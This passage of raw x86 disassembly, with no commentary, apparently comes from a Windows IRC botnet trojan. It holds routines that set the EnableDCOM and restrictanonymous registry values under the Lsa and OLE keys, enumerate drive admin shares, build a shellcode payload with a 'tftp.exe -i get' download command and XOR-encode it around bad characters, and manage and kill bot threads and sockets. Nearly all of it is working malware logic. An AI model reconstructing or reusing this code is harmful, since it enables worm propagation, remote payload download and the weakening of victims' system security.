mov esi, [ebp+var_8]
xor ebx, ebx
inc ebx
cmp [ebp+var_4], ebx
jb loc_4147B5
loc_414735: ; CODE XREF: sub_414500+2B1�j
mov edi, [esi]
push edi
call sub_4179FC
cmp word ptr [edi+eax*2-2], 24h
pop ecx
jnz short loc_4147AA
push edi
call sub_413112
push eax
push 0
call sub_413225
add esp, 0Ch
push dword ptr [esi]
test eax, eax
lea eax, [ebp+var_214]
jnz short loc_41476A
push offset unk_437DA8
jmp short loc_41476F
; ---------------------------------------------------------------------------
loc_41476A: ; CODE XREF: sub_414500+261�j
push offset unk_437D68
loc_41476F: ; CODE XREF: sub_414500+268�j
push 200h
push eax
call sub_41588A
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_41479D
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_412BD1
add esp, 14h
loc_41479D: ; CODE XREF: sub_414500+281�j
lea eax, [ebp+var_214]
push eax
call sub_40B078
pop ecx
loc_4147AA: ; CODE XREF: sub_414500+244�j
add esi, 28h
inc ebx
cmp ebx, [ebp+var_4]
jbe short loc_414735
xor edi, edi
loc_4147B5: ; CODE XREF: sub_414500+22F�j
push [ebp+var_8]
call dword_43CAB4
loc_4147BE: ; CODE XREF: sub_414500+221�j
cmp [ebp+var_10], 0EAh
jz loc_414687
lea eax, [ebp+var_214]
push offset unk_437D2C
push eax
call sub_415316
pop ecx
pop ecx
pop ebx
jmp short loc_4147F4
; ---------------------------------------------------------------------------
loc_4147E1: ; CODE XREF: sub_414500+177�j
lea eax, [ebp+var_214]
push offset unk_437CE8
push eax
call sub_415316
pop ecx
pop ecx
loc_4147F4: ; CODE XREF: sub_414500+2DF�j
cmp [ebp+arg_C], edi
jnz short loc_414812
push edi
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_412BD1
add esp, 14h
loc_414812: ; CODE XREF: sub_414500+2F7�j
lea eax, [ebp+var_214]
push eax
call sub_40B078
pop ecx
xor eax, eax
pop edi
inc eax
pop esi
leave
retn
sub_414500 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414826 proc near ; CODE XREF: sub_4144A0:loc_4144E7�p
var_220 = byte ptr -220h
var_20 = byte ptr -20h
var_14 = byte ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 220h
push ebx
xor ebx, ebx
cmp dword_43CAF0, ebx
push esi
jnz loc_414954
lea eax, [ebp+var_4]
mov esi, 80000002h
push eax
push 2001Fh
push ebx
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
push esi
call dword_43CA94 ; RegOpenKeyExA
test eax, eax
jnz short loc_4148B1
mov ax, word_438260
mov word ptr [ebp+var_8+2], ax
lea eax, [ebp+var_8+2]
push eax
call sub_415B10
pop ecx
push eax
lea eax, [ebp+var_8+2]
push eax
push 1
push ebx
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call dword_43CA48 ; RegSetValueExA
test eax, eax
lea eax, [ebp+var_220]
jz short loc_414899
push offset unk_438228
jmp short loc_41489E
; ---------------------------------------------------------------------------
loc_414899: ; CODE XREF: sub_414826+6A�j
push offset dword_4381F8
loc_41489E: ; CODE XREF: sub_414826+71�j
push eax
call sub_415316
pop ecx
pop ecx
push [ebp+var_4]
call dword_43CA00 ; RegCloseKey
jmp short loc_4148C4
; ---------------------------------------------------------------------------
loc_4148B1: ; CODE XREF: sub_414826+36�j
lea eax, [ebp+var_220]
push offset unk_437FA0
push eax
call sub_415316
pop ecx
pop ecx
loc_4148C4: ; CODE XREF: sub_414826+89�j
cmp [ebp+arg_C], ebx
jnz short loc_4148E3
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_412BD1
add esp, 14h
loc_4148E3: ; CODE XREF: sub_414826+A1�j
lea eax, [ebp+var_220]
push eax
call sub_40B078
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push ebx
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call dword_43CA94 ; RegOpenKeyExA
test eax, eax
jnz short loc_41494D
lea eax, [ebp+var_8]
push 4
push eax
push 4
push ebx
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov [ebp+var_8], ebx
call dword_43CA48 ; RegSetValueExA
test eax, eax
lea eax, [ebp+var_220]
jz short loc_414935
push offset unk_4381A8
jmp short loc_41493A
; ---------------------------------------------------------------------------
loc_414935: ; CODE XREF: sub_414826+106�j
push offset unk_438160
loc_41493A: ; CODE XREF: sub_414826+10D�j
push eax
call sub_415316
pop ecx
pop ecx
push [ebp+var_4]
call dword_43CA00 ; RegCloseKey
jmp short loc_414967
; ---------------------------------------------------------------------------
loc_41494D: ; CODE XREF: sub_414826+E2�j
push offset unk_438110
jmp short loc_414959
; ---------------------------------------------------------------------------
loc_414954: ; CODE XREF: sub_414826+13�j
push offset unk_437E58
loc_414959: ; CODE XREF: sub_414826+12C�j
lea eax, [ebp+var_220]
push eax
call sub_415316
pop ecx
pop ecx
loc_414967: ; CODE XREF: sub_414826+125�j
cmp [ebp+arg_C], ebx
jnz short loc_414986
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_412BD1
add esp, 14h
loc_414986: ; CODE XREF: sub_414826+144�j
lea eax, [ebp+var_220]
push eax
call sub_40B078
cmp dword_43CB18, ebx
pop ecx
jnz loc_414AFD
push edi
xor esi, esi
mov edi, 200h
loc_4149A7: ; CODE XREF: sub_414826+1EE�j
push dword_437CAC[esi]
push off_437CA8[esi]
push ebx
call sub_413179
add esp, 0Ch
push off_437CA8[esi]
test eax, eax
lea eax, [ebp+var_220]
jnz short loc_4149D3
push offset unk_4380DC
jmp short loc_4149D8
; ---------------------------------------------------------------------------
loc_4149D3: ; CODE XREF: sub_414826+1A4�j
push offset unk_4380A0
loc_4149D8: ; CODE XREF: sub_414826+1AB�j
push edi
push eax
call sub_41588A
add esp, 10h
cmp [ebp+arg_C], ebx
jnz short loc_414A01
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_412BD1
add esp, 14h
loc_414A01: ; CODE XREF: sub_414826+1BF�j
lea eax, [ebp+var_220]
push eax
call sub_40B078
add esi, 8
pop ecx
cmp esi, 10h
jb short loc_4149A7
call dword_421148 ; GetLogicalDrives
test eax, eax
mov [ebp+var_4], eax
mov bl, 41h
jz loc_414AE5
loc_414A29: ; CODE XREF: sub_414826+2B9�j
mov eax, [ebp+var_4]
and eax, 1
cmp al, 1
jnz loc_414ADA
cmp bl, 41h
jz loc_414ADA
movsx esi, bl
push esi
push offset aC_3 ; "%c$"
lea eax, [ebp+var_14]
push 0Ah
push eax
call sub_41588A
push esi
push offset aC_2 ; "%c:\\"
lea eax, [ebp+var_20]
push 0Ah
push eax
call sub_41588A
add esp, 20h
lea eax, [ebp+var_20]
push eax
call dword_43CA84 ; GetDriveTypeA
cmp eax, 3
jnz short loc_414ADA
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14]
push eax
push 0
call sub_413179
add esp, 0Ch
test eax, eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_220]
jnz short loc_414A9E
push offset unk_4380DC
jmp short loc_414AA3
; ---------------------------------------------------------------------------
loc_414A9E: ; CODE XREF: sub_414826+26F�j
push offset unk_4380A0
loc_414AA3: ; CODE XREF: sub_414826+276�j
push edi
push eax
call sub_41588A
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_414ACD
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_412BD1
add esp, 14h
loc_414ACD: ; CODE XREF: sub_414826+28B�j
lea eax, [ebp+var_220]
push eax
call sub_40B078
pop ecx
loc_414ADA: ; CODE XREF: sub_414826+20B�j
; sub_414826+214�j ...
inc bl
shr [ebp+var_4], 1
jnz loc_414A29
loc_414AE5: ; CODE XREF: sub_414826+1FD�j
lea eax, [ebp+var_220]
push offset unk_43805C
push eax
call sub_415316
pop ecx
xor ebx, ebx
pop ecx
pop edi
jmp short loc_414B10
; ---------------------------------------------------------------------------
loc_414AFD: ; CODE XREF: sub_414826+173�j
lea eax, [ebp+var_220]
push offset unk_437CE8
push eax
call sub_415316
pop ecx
pop ecx
loc_414B10: ; CODE XREF: sub_414826+2D5�j
cmp [ebp+arg_C], ebx
jnz short loc_414B2E
push ebx
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_412BD1
add esp, 14h
loc_414B2E: ; CODE XREF: sub_414826+2ED�j
lea eax, [ebp+var_220]
push eax
call sub_40B078
pop ecx
xor eax, eax
pop esi
inc eax
pop ebx
leave
retn
sub_414826 endp
; =============== S U B R O U T I N E =======================================
sub_414B42 proc near ; CODE XREF: sub_414B62+A�p
; sub_414C3A+8�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_415B10
push [esp+8+arg_4]
mov esi, eax
call sub_415B10
pop ecx
lea eax, [esi+eax*2+0C1h]
pop ecx
pop esi
retn
sub_414B42 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414B62 proc near ; CODE XREF: sub_414C51+49�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_C]
push [ebp+arg_8]
call sub_414B42
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
mov [ebp+var_4], eax
jbe short loc_414B7F
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_414B7F: ; CODE XREF: sub_414B62+17�j
push ebx
push esi
push edi
push [ebp+arg_8]
call sub_415B10
push [ebp+arg_C]
mov esi, eax
call sub_415B10
mov edi, eax
mov ebx, [ebp+arg_0]
push 0FFFFFFEDh
lea eax, [edi+esi+12h]
mov dword_4382FC, eax
lea eax, [edi+1]
mov dword_43831D, eax
lea eax, [edi+17h]
mov dword_438315, eax
pop eax
push 74h
sub eax, edi
push offset dword_438298
push ebx
mov dword_43832B, eax
call sub_4153F0
push esi
lea eax, [ebx+74h]
push [ebp+arg_8]
push eax
call sub_4153F0
add esi, 74h
push 5
push (offset aTftp_exeIGet+0Ch)
lea eax, [esi+ebx]
push eax
call sub_4153F0
add esi, 5
push edi
push [ebp+arg_C]
lea eax, [esi+ebx]
push eax
call sub_4153F0
add esi, edi
push 10h
push (offset aTftp_exeIGet+11h)
lea eax, [esi+ebx]
push eax
call sub_4153F0
add esp, 44h
add esi, 10h
push edi
lea eax, [esi+ebx]
push [ebp+arg_C]
push eax
call sub_4153F0
add esi, edi
push 38h
add esi, ebx
push offset byte_438321
push esi
call sub_4153F0
mov eax, [ebp+var_4]
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_414B62 endp
; =============== S U B R O U T I N E =======================================
sub_414C3A proc near ; CODE XREF: sub_414C51+D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_414B42
push eax
call sub_414CBE
add esp, 0Ch
retn
sub_414C3A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414C51 proc near ; CODE XREF: sub_403166+32�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_8]
push edi
mov edi, [ebp+arg_C]
push edi
push ebx
call sub_414C3A
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
ja short loc_414C71
cmp eax, 0FFFFh
jbe short loc_414C75
loc_414C71: ; CODE XREF: sub_414C51+17�j
xor eax, eax
jmp short loc_414CBA
; ---------------------------------------------------------------------------
loc_414C75: ; CODE XREF: sub_414C51+1E�j
push esi
push edi
push ebx
call sub_414B42
add eax, 101h
push eax
call sub_415BE9
add esp, 0Ch
mov esi, eax
push edi
push ebx
push edi
push ebx
call sub_414B42
pop ecx
pop ecx
push eax
push esi
call sub_414B62
push eax
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_414CD9
push esi
mov edi, eax
call sub_415C9B
add esp, 24h
mov eax, edi
pop esi
loc_414CBA: ; CODE XREF: sub_414C51+22�j
pop edi
pop ebx
pop ebp
retn
sub_414C51 endp
; =============== S U B R O U T I N E =======================================
sub_414CBE proc near ; CODE XREF: sub_414C3A+E�p
; sub_414CD9+47�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test cl, cl
jnz short loc_414CC7
inc ecx
loc_414CC7: ; CODE XREF: sub_414CBE+6�j
mov eax, 0FFh
cmp eax, ecx
sbb eax, eax
and eax, 2
add eax, 15h
add eax, ecx
retn
sub_414CBE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414CD9 proc near ; CODE XREF: sub_414C51+56�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_C]
cmp dl, 0Ah
jz short loc_414CF3
cmp dl, 0Dh
jz short loc_414CF3
cmp dl, 5Ch
jz short loc_414CF3
test dl, dl
jnz short loc_414CF7
loc_414CF3: ; CODE XREF: sub_414CD9+A�j
; sub_414CD9+F�j ...
inc edx
mov [ebp+arg_C], edx
loc_414CF7: ; CODE XREF: sub_414CD9+18�j
push esi
mov esi, 0FFh
cmp edx, esi
jbe short loc_414D1F
mov eax, edx
shr eax, 8
cmp al, 0Ah
jz short loc_414D16
cmp al, 0Dh
jz short loc_414D16
cmp al, 5Ch
jz short loc_414D16
test al, al
jnz short loc_414D1F
loc_414D16: ; CODE XREF: sub_414CD9+2F�j
; sub_414CD9+33�j ...
add edx, 100h
mov [ebp+arg_C], edx
loc_414D1F: ; CODE XREF: sub_414CD9+26�j
; sub_414CD9+3B�j
push edx
call sub_414CBE
cmp eax, [ebp+arg_4]
pop ecx
mov [ebp+var_4], eax
ja short loc_414D35
cmp eax, 0FFFFh
jbe short loc_414D3C
loc_414D35: ; CODE XREF: sub_414CD9+53�j
xor eax, eax
jmp loc_414DD7
; ---------------------------------------------------------------------------
loc_414D3C: ; CODE XREF: sub_414CD9+5A�j
push ebx
mov bl, byte_46BAD8
xor ecx, ecx
push edi
mov edi, [ebp+arg_8]
test edx, edx
jbe short loc_414D69
loc_414D4D: ; CODE XREF: sub_414CD9+8E�j
mov al, [ecx+edi]
xor al, bl
jz short loc_414D60
cmp al, 0Ah
jz short loc_414D60
cmp al, 0Dh
jz short loc_414D60
cmp al, 5Ch
jnz short loc_414D64
loc_414D60: ; CODE XREF: sub_414CD9+79�j
; sub_414CD9+7D�j ...
inc bl
xor ecx, ecx
loc_414D64: ; CODE XREF: sub_414CD9+85�j
inc ecx
cmp ecx, edx
jb short loc_414D4D
loc_414D69: ; CODE XREF: sub_414CD9+72�j
cmp edx, esi
mov byte_46BAD8, bl
ja short loc_414D95
push 15h
push offset loc_438280
push [ebp+arg_0]
mov byte_43828D, dl
mov byte_438291, bl
call sub_4153F0
add esp, 0Ch
push 15h
jmp short loc_414DB6
; ---------------------------------------------------------------------------
loc_414D95: ; CODE XREF: sub_414CD9+98�j
push 17h
push offset loc_438268
push [ebp+arg_0]
mov word_438276, dx
mov byte_43827B, bl
call sub_4153F0
add esp, 0Ch
push 17h
loc_414DB6: ; CODE XREF: sub_414CD9+BA�j
xor eax, eax
pop ecx
cmp [ebp+arg_C], eax
jbe short loc_414DD2
mov edx, [ebp+arg_0]
lea esi, [ecx+edx]
loc_414DC4: ; CODE XREF: sub_414CD9+F7�j
mov cl, [eax+edi]
xor cl, bl
mov [esi+eax], cl
inc eax
cmp eax, [ebp+arg_C]
jb short loc_414DC4
loc_414DD2: ; CODE XREF: sub_414CD9+E3�j
mov eax, [ebp+var_4]
pop edi
pop ebx
loc_414DD7: ; CODE XREF: sub_414CD9+5E�j
pop esi
leave
retn
sub_414CD9 endp
; =============== S U B R O U T I N E =======================================
sub_414DDA proc near ; CODE XREF: sub_406048+21F�p
; sub_4071B6+ED�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
xor edi, edi
mov eax, offset dword_441998
loc_414DE2: ; CODE XREF: sub_414DDA+18�j
cmp byte ptr [eax], 0
jz short loc_414DF6
add eax, 234h
inc edi
cmp eax, offset dword_46AE88
jl short loc_414DE2
jmp short loc_414E41
; ---------------------------------------------------------------------------
loc_414DF6: ; CODE XREF: sub_414DDA+B�j
push esi
mov esi, edi
imul esi, 234h
push 1FFh
push [esp+0Ch+arg_0]
lea eax, dword_441998[esi]
push eax
call sub_416BE0
mov eax, [esp+14h+arg_4]
and dword_441B9C[esi], 0
and dword_441BA0[esi], 0
mov dword_441B98[esi], eax
mov eax, [esp+14h+arg_8]
add esp, 0Ch
and byte_441BB0[esi], 0
mov dword_441BA4[esi], eax
pop esi
loc_414E41: ; CODE XREF: sub_414DDA+1A�j
mov eax, edi
pop edi
retn
sub_414DDA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414E45 proc near ; DATA XREF: sub_40CD3A+55FD�o
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 98h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
rep movsd
push [ebp+var_10]
mov dword ptr [eax+94h], 1
lea eax, [ebp+var_94]
push [ebp+var_C]
push eax
push [ebp+var_98]
call sub_414E97
push [ebp+var_14]
call sub_4150F0
add esp, 14h
push 0
call dword_421048 ; ExitThread
pop edi
pop esi
sub_414E45 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414E97 proc near ; CODE XREF: sub_414E45+38�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push [ebp+arg_8]
push offset aThreadList ; "-[Thread List]-"
push [ebp+arg_4]
push [ebp+arg_0]
call sub_412BD1
add esp, 14h
xor edi, edi
mov esi, offset dword_441998
loc_414EC1: ; CODE XREF: sub_414E97+78�j
cmp byte ptr [esi], 0
jz short loc_414F02
cmp [ebp+arg_C], 0
jnz short loc_414ED5
cmp dword ptr [esi+204h], 0
jnz short loc_414F02
loc_414ED5: ; CODE XREF: sub_414E97+33�j
push esi
push edi
lea eax, [ebp+var_200]
push offset aD_S ; "%d. %s"
push eax
call sub_415316
push 1
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_412BD1
add esp, 24h
loc_414F02: ; CODE XREF: sub_414E97+2D�j
; sub_414E97+3C�j
add esi, 234h
inc edi
cmp esi, offset dword_46AE88
jl short loc_414EC1
pop edi
pop esi
leave
retn
sub_414E97 endp
; =============== S U B R O U T I N E =======================================
sub_414F15 proc near ; CODE XREF: sub_40CD3A+49B9�p
; sub_414F9D+12�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
xor ebx, ebx
xor ebp, ebp
cmp esi, ebx
jle short loc_414F97
cmp esi, 12Ch
jge short loc_414F97
imul esi, 234h
push edi
push ebx
lea edi, dword_441BAC[esi]
push dword ptr [edi]
call dword_421130 ; TerminateThread
cmp [edi], ebx
jz short loc_414F47
inc ebp
loc_414F47: ; CODE XREF: sub_414F15+2F�j
mov [edi], ebx
lea edi, dword_441BA0[esi]
mov dword_441B98[esi], ebx
mov dword_441B9C[esi], ebx
mov eax, [edi]
cmp eax, ebx
jbe short loc_414F68
push eax
call sub_413EDB
pop ecx
loc_414F68: ; CODE XREF: sub_414F15+4A�j
mov [edi], ebx
lea edi, dword_441BA4[esi]
mov byte ptr dword_441998[esi], bl
mov byte_441BB0[esi], bl
push dword ptr [edi]
call dword_43CABC ; closesocket
lea esi, dword_441BA8[esi]
mov [edi], ebx
push dword ptr [esi]
call dword_43CABC ; closesocket
mov [esi], ebx
pop edi
loc_414F97: ; CODE XREF: sub_414F15+D�j
; sub_414F15+15�j
mov eax, ebp
pop esi
pop ebp
pop ebx
retn
sub_414F15 endp
; =============== S U B R O U T I N E =======================================
sub_414F9D proc near ; CODE XREF: sub_409D34:loc_409D58�p
; sub_40C48C+18�p ...
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, offset dword_441998
loc_414FA9: ; CODE XREF: sub_414F9D+2A�j
cmp byte ptr [esi], 0
jz short loc_414FBA
push edi
call sub_414F15
test eax, eax
pop ecx
jz short loc_414FBA
inc ebx
loc_414FBA: ; CODE XREF: sub_414F9D+F�j
; sub_414F9D+1A�j
add esi, 234h
inc edi
cmp esi, offset dword_46AE88
jl short loc_414FA9
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_414F9D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414FCF proc near ; CODE XREF: sub_40CD3A+1C48�p
; sub_40CD3A+1CB9�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], ebx
mov esi, offset dword_441B9C
loc_414FE3: ; CODE XREF: sub_414FCF+43�j
mov eax, [esi-4]
cmp eax, [ebp+arg_0]
jnz short loc_415005
test edi, edi
jle short loc_414FF7
cmp [esi], edi
jz short loc_414FF7
cmp ebx, edi
jnz short loc_415005
loc_414FF7: ; CODE XREF: sub_414FCF+1E�j
; sub_414FCF+22�j
push ebx
call sub_414F15
test eax, eax
pop ecx
jz short loc_415005
inc [ebp+var_4]
loc_415005: ; CODE XREF: sub_414FCF+1A�j
; sub_414FCF+26�j ...
add esi, 234h
inc ebx
cmp esi, offset dword_46B08C
jl short loc_414FE3
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_414FCF endp
; =============== S U B R O U T I N E =======================================
sub_41501C proc near ; CODE XREF: sub_40713F+B�p
; sub_4071B6+2D�p ...
arg_0 = dword ptr 4
xor eax, eax
mov ecx, offset dword_441B98
loc_415023: ; CODE XREF: sub_41501C+1C�j
mov edx, [ecx]
cmp edx, [esp+arg_0]
jnz short loc_41502C
inc eax
loc_41502C: ; CODE XREF: sub_41501C+D�j
add ecx, 234h
cmp ecx, offset dword_46B088
jl short loc_415023
retn
sub_41501C endp
; =============== S U B R O U T I N E =======================================
sub_41503B proc near ; CODE XREF: sub_40CD3A+508A�p
arg_0 = dword ptr 4
xor eax, eax
xor edx, edx
mov ecx, offset dword_441B98
push esi
loc_415045: ; CODE XREF: sub_41503B+1F�j
mov esi, [ecx]
cmp esi, [esp+4+arg_0]
jz short loc_41505E
add ecx, 234h
inc edx
cmp ecx, offset dword_46B088
jl short loc_415045
pop esi
retn
; ---------------------------------------------------------------------------
loc_41505E: ; CODE XREF: sub_41503B+10�j
mov eax, edx
pop esi
retn
sub_41503B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415062 proc near ; CODE XREF: sub_40CD3A+5797�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 200h
xor eax, eax
cmp [ebp+arg_1C], eax
jz short loc_41507B
push [ebp+arg_1C]
call sub_41587F
pop ecx
loc_41507B: ; CODE XREF: sub_415062+E�j
push eax
push [ebp+arg_18]
call sub_414FCF
pop ecx
test eax, eax
pop ecx
jle short loc_4150A7
push eax
lea eax, [ebp+var_200]
push [ebp+arg_14]
push [ebp+arg_10]
push offset aSSStopped_DThr ; "%s: %s stopped. (%d thread(s) stopped.)"...
push eax
call sub_415316
add esp, 14h
jmp short loc_4150C1
; ---------------------------------------------------------------------------
loc_4150A7: ; CODE XREF: sub_415062+26�j
push [ebp+arg_14]
lea eax, [ebp+var_200]
push [ebp+arg_10]
push offset aSNoSThreadFoun ; "%s: No %s thread found."
push eax
call sub_415316
add esp, 10h
loc_4150C1: ; CODE XREF: sub_415062+43�j
cmp [ebp+arg_C], 0
jnz short loc_4150E1
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_412BD1
add esp, 14h
loc_4150E1: ; CODE XREF: sub_415062+63�j
lea eax, [ebp+var_200]
push eax
call sub_40B078
pop ecx
leave
retn
sub_415062 endp
; =============== S U B R O U T I N E =======================================
sub_4150F0 proc near ; CODE XREF: start+A2�p sub_401444+8D�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
imul eax, 234h
mov dword_441BAC[eax], ecx
mov dword_441B98[eax], ecx
mov dword_441B9C[eax], ecx
mov dword_441BA0[eax], ecx
mov dword_441BA4[eax], ecx
mov dword_441BA8[eax], ecx
mov byte ptr dword_441998[eax], cl
mov byte_441BB0[eax], cl
retn
sub_4150F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41512D proc near ; CODE XREF: sub_40CD3A+5B9B�p
; sub_415255+61�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor eax, eax
push esi
mov esi, [ebp+arg_0]
inc eax
jmp short loc_41518F
; ---------------------------------------------------------------------------
loc_415139: ; CODE XREF: sub_41512D+66�j
cmp eax, 1
jnz short loc_4151A0
mov edx, [ebp+arg_4]
mov dl, [edx]
test dl, dl
jz short loc_4151A0
cmp cl, 2Ah
jz short loc_415178
cmp cl, 3Fh
jz short loc_41515D
cmp cl, 5Bh
jz short loc_415162
xor eax, eax
cmp cl, dl
setz al
loc_41515D: ; CODE XREF: sub_41512D+22�j
inc [ebp+arg_4]
jmp short loc_41518B
; ---------------------------------------------------------------------------
loc_415162: ; CODE XREF: sub_41512D+27�j
lea eax, [ebp+arg_4]
inc esi
push eax
lea eax, [ebp+arg_0]
push eax
mov [ebp+arg_0], esi
call sub_4151C1
mov esi, [ebp+arg_0]
jmp short loc_415189
; ---------------------------------------------------------------------------
loc_415178: ; CODE XREF: sub_41512D+1D�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
push eax
call sub_415255
mov esi, [ebp+arg_0]
dec esi
loc_415189: ; CODE XREF: sub_41512D+49�j
pop ecx
pop ecx
loc_41518B: ; CODE XREF: sub_41512D+33�j
inc esi
mov [ebp+arg_0], esi
loc_41518F: ; CODE XREF: sub_41512D+A�j
mov cl, [esi]
test cl, cl
jnz short loc_415139
jmp short loc_4151A0
; ---------------------------------------------------------------------------
loc_415197: ; CODE XREF: sub_41512D+76�j
cmp eax, 1
jnz short loc_4151BC
inc esi
mov [ebp+arg_0], esi
loc_4151A0: ; CODE XREF: sub_41512D+F�j
; sub_41512D+18�j ...
cmp byte ptr [esi], 2Ah
jz short loc_415197
cmp eax, 1
jnz short loc_4151BC
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jnz short loc_4151BC
cmp byte ptr [esi], 0
jnz short loc_4151BC
xor eax, eax
inc eax
jmp short loc_4151BE
; ---------------------------------------------------------------------------
loc_4151BC: ; CODE XREF: sub_41512D+6D�j
; sub_41512D+7B�j ...
xor eax, eax
loc_4151BE: ; CODE XREF: sub_41512D+8D�j
pop esi
pop ebp
retn
sub_41512D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4151C1 proc near ; CODE XREF: sub_41512D+41�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov edx, [ebp+arg_0]
push edi
xor edi, edi
xor eax, eax
mov ecx, [edx]
and [ebp+var_8], edi
inc eax
cmp byte ptr [ecx], 21h
mov [ebp+var_4], eax
jnz short loc_4151E2
inc ecx
mov [ebp+var_8], eax
mov [edx], ecx
loc_4151E2: ; CODE XREF: sub_4151C1+19�j
push ebx
push esi
loc_4151E4: ; CODE XREF: sub_4151C1+77�j
mov ecx, [edx]
mov bl, [ecx]
cmp bl, 5Dh
jnz short loc_4151F2
cmp [ebp+var_4], eax
jnz short loc_41523A
loc_4151F2: ; CODE XREF: sub_4151C1+2A�j
test edi, edi
jnz short loc_41522F
cmp bl, 2Dh
jnz short loc_415223
lea esi, [ecx+1]
mov cl, [ecx-1]
mov al, [esi]
cmp cl, al
jge short loc_415223
cmp al, 5Dh
jz short loc_415223
cmp [ebp+var_4], edi
jnz short loc_415223
mov ebx, [ebp+arg_4]
mov ebx, [ebx]
mov bl, [ebx]
cmp bl, cl
jl short loc_41522F
cmp bl, al
jg short loc_41522F
mov [edx], esi
jmp short loc_41522C
; ---------------------------------------------------------------------------
loc_415223: ; CODE XREF: sub_4151C1+38�j
; sub_4151C1+44�j ...
mov eax, [ebp+arg_4]
